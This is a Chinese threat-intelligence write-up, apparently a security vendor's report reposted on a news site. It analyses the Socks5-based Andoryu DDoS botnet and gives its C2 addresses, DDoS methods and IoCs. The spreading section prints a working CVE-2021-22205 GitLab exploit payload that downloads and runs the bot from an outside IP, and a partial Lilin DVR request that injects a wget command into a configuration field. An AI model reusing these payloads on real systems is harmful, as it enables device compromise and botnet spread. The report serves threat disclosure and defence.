服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

Andoryu Botnet—基于Socks协议通信的新型僵尸网络

日期: 来源:奇安信威胁情报中心收集编辑:威胁情报中心

1. 概述

2023 年 2月初,奇安信威胁情报中心威胁监控系统监测到一起未知家族恶意样本利用CVE-2021-22205漏洞传播的事件,经过分析确认该样本不属于已知的僵尸网络家族。


通过样本编写者对其僵尸网络的命名,我们将此新型僵尸网络称为Andoryu Botnet,该新型僵尸网络通过Socks5协议与C2进行通信。


Andoryu Botnet 最近传播趋势如下,通过其活跃时间点我们得知Andoryu Botnet当前仅在样本进行更新迭代的时间点前后进行小范围传播,因此可以判断该僵尸网络还处于测试阶段:


2. 样本关键行为分析

本文以 x86-64 样本为例进行分析,样本信息:

文件名

文件大小

文件MD5

Andoryu.x86

42208 bytes

D203E1BB0BA3E8385FF9E1F83C10EB2D

 

2.1 运行参数判定

运行时会首先判断是否存在参数,当存有一个参数时样本才会正常运行:


2.2 字符串加密

样本中的大部分关键字符串加密,运行前期通过一个函数对所有加密的字符串进行批量解密:


2.3 进程名伪装

使用 prctl 函数将进程名修改为 "/bin/bash":


2.4 打印僵尸网络信息

解密后的字符串中存在该僵尸网络信息,样本运行时将其打印到控制台:

由此命名该僵尸网络为Andoryu Botnet,并且可以了解到编写者测试样本的时间为2022年12月30日。

3. Socks5通信

3.1 通信过程

该僵尸网络通过socks协议进行通信,具体通信过程如下:

一、首先连接硬编码的代理服务器,代理服务器地址为 "152.67.66.37:1080"。

二、与代理服务器成功三次握手后进行socks认证。

采用无用户密码认证的socks5代理:

三、告知代理服务器需要访问哪个远程服务器,远程服务器地址批量解密时获取,DST_C2 = "172.86.123.20:1025"。

四、socks通信,发送上线包。

上线包数据中包含本机IP信息:

五、通过代理接收C2下发指令。

奇安信威胁情报中心当前已监控到下发数据,但攻击者暂时还未发出DDoS攻击指令:

后续我们将持续对Andoryu Botnet进行跟踪并公布其最新动态。


3.2 DDoS方法

AndoryuBot支持多种DDoS方法,具体如下:

Name

Description

icmp-echo

ICMP Flood

udp-ovh

UDP Flood for OVH

udp-game

UDP Game Flood

udp-plain

UDP Plain Flood

tcp-raw

TCP Flood

tcp-socket

TCP Syn Flood

tcp-handshake

TCP Flood

4. 样本更新及传播

通过对样本的关联分析,Andoryu Botnet更新始于2022年12月份,期间进行过两次更新迭代,更新时作者并未将样本中的输出测试时间进行修改,更新内容主要是DST_C2地址及支持的架构,最新版本AndoryuBot支持的CPU架构如下:
  • Arm

  • Mips

  • M68K

  • SuperH

  • Sparc

  • x86

Andoryu Botnet的传播方式除了CVE-2021-22205外,还通过Lilin DVR RCE进行扩散,本次发现的Payload如下:

CVE-2021-22205:

P(metadata.(Copyright "\" . qx{TF=$(mktemp -u);mkfifo $TF && rm -rf Andoryu.10wget;wget http://47.87.154.192/Andoryu.x86 -O Andoryu.10wget;chmod 777 Andoryu.10wget;./Andoryu.10wget gitlab.x86;rm -rf Andoryu.10wget;<$TF | sh 1>$TF} . \" b ") )
Lilin DVR RCE:


User-Agent: Abcd<?xml version="1.0" encoding="UTF-8"?><DVR Platform="Hi3520"><SetConfiguration File="service.xml"><![CDATA[<?xml version="1.0" encoding="UTF-8"?><DVR Platform="Hi3520"><Service><NTP Enable="True" Interval="20000" Server="time.nist.gov&cd /tmp;wget -O-


5. IoCs

MD5:

D203E1BB0BA3E8385FF9E1F83C10EB2D

28F10E60D05018E6D28B79F0976A8542

F9018E4401116435DCFE2DC9D14D0FD5

2BABAF24B23872749EEC1452D7E7C0F3

ABD2496C3B703BD722386A848CC0BC12

6335ECB85ED6C6FCCF71FD841939BEC4

70A568C47785A8C58AA1D755EFE0E39E

FFE05160D769F441EF4A67271F9E614C

BB7DECCC2F6CEB2D5A5C7F5A05A4BBB1

0A1B14C2B8A453323841431FA44D0E32

C9CE8E0A1B13CBB6719133AFE5988CA7

 

C&C:

152.67.66.37:1080

172.86.123.20: 1025

104.234.239.190:1025

点击阅读原文至ALPHA 6.0

即刻助力威胁研判


相关阅读

  • 近期俄乌DDoS攻击事件汇总

  • 概述美国总统拜登最近突访乌克兰基辅,与乌克兰领导人会谈并发表公开演说,表达对乌方的支持,并增加对乌方的战争援助。给当前胶着的俄乌局势带来了新的变数,使未来俄乌局势的走向
  • Kaiji僵尸网络重出江湖,Ares黑客团伙浮出水面?

  • 1. 概述近期,奇安信威胁情报中心威胁监控系统监测到一个基于GO语言编写的僵尸网络正在通过多个漏洞进行传播,经过分析确认该样本属于已经被披露的僵尸网络家族 Kaiji,该僵尸网
  • 谷歌分析:俄乌战争对网络威胁格局的影响

  • 编者按:谷歌公司2月16日发布题为《战争迷雾:乌克兰冲突如何改变网络威胁格局》的报告,提供了关于俄罗斯政府支持的攻击者、信息行动和网络犯罪生态系统威胁行为者的新发现和见
  • 美国国防部服务器没密码,3TB敏感数据泄露

  • 关注我们带你读懂网络安全上周末,安全研究人员Anurag Sen发现美国国防部一台存储了3TB内部军事电子邮件的服务器在线暴露长达两周,该服务器托管在微软的Azure政府云上,供美国国
  • 全球DDoS攻击观察:最新变化与未来趋势

  • 本文2997字 阅读约需 8分钟随着全球各大企业和机构加强网络空间安全防御,并采取更主动保护措施,网络攻击者正在调整其攻击技术,提高其攻击的复杂性。网络犯罪经济的产业化,客
  • NIST将对网络安全框架进行重大更新

  • 聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士美国国家标准与技术研究院 (NIST) 正在计划对网络安全框架 (CSF) 进行重大更新。这是五年来首次对该框架进行更新。CSF 在20
  • 钓鱼邮件攻击频发,360 沙箱云助您防御

  • 工业和信息化部网络安全管理局在1月13日发布了一篇名为《关于防范钓鱼邮件攻击的网络安全风险提示》的告警文章,指出:“利用仿冒电子邮箱发起的钓鱼邮件攻击事件频发。攻击者
  • 2022年全球高级持续性威胁(APT)研究报告

  • 2022年高级持续性威胁概览在经历了新冠肺炎疫情肆虐,当今世界正处在大发展大变革时期。俄乌冲突爆发、全球经济衰退加之国际间各种力量的较量,使得国际局势日益错综复杂。2022
  • 从网暴事件能吸取到的教训

  • 作为一名普通网友,从杭州姑娘被网暴这个事件上能吸取到的教训应该是:别在网络上太多暴露自己的生活。真的是认真的建议。作为一个行走网络江湖多年,不知道被网暴多少次的过来人

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • Andoryu Botnet—基于Socks协议通信的新型僵尸网络

  • 1. 概述2023 年 2月初,奇安信威胁情报中心威胁监控系统监测到一起未知家族恶意样本利用CVE-2021-22205漏洞传播的事件,经过分析确认该样本不属于已知的僵尸网络家族。通过样本
  • 近期俄乌DDoS攻击事件汇总

  • 概述美国总统拜登最近突访乌克兰基辅,与乌克兰领导人会谈并发表公开演说,表达对乌方的支持,并增加对乌方的战争援助。给当前胶着的俄乌局势带来了新的变数,使未来俄乌局势的走向
  • 数字孪生本质及落地

  • 毋庸置疑,数字孪生是当今智能制造领域最热的话题之一,Gartner自2016年连续三年将数字孪生列为十大战略科技发展趋势。近期埃森哲对全球6,200多位业务和信息技术高层管理者进行
  • Kaiji僵尸网络重出江湖,Ares黑客团伙浮出水面?

  • 1. 概述近期,奇安信威胁情报中心威胁监控系统监测到一个基于GO语言编写的僵尸网络正在通过多个漏洞进行传播,经过分析确认该样本属于已经被披露的僵尸网络家族 Kaiji,该僵尸网
  • ​魔角石墨烯,再登Nature!

  • 特别说明:本文由学研汇技术 中心原创撰写,旨在分享相关科研知识。因学识有限,难免有所疏漏和错误,请读者批判性阅读,也恳请大方之家批评指正。原创丨彤心未泯(学研汇 技术中心)编辑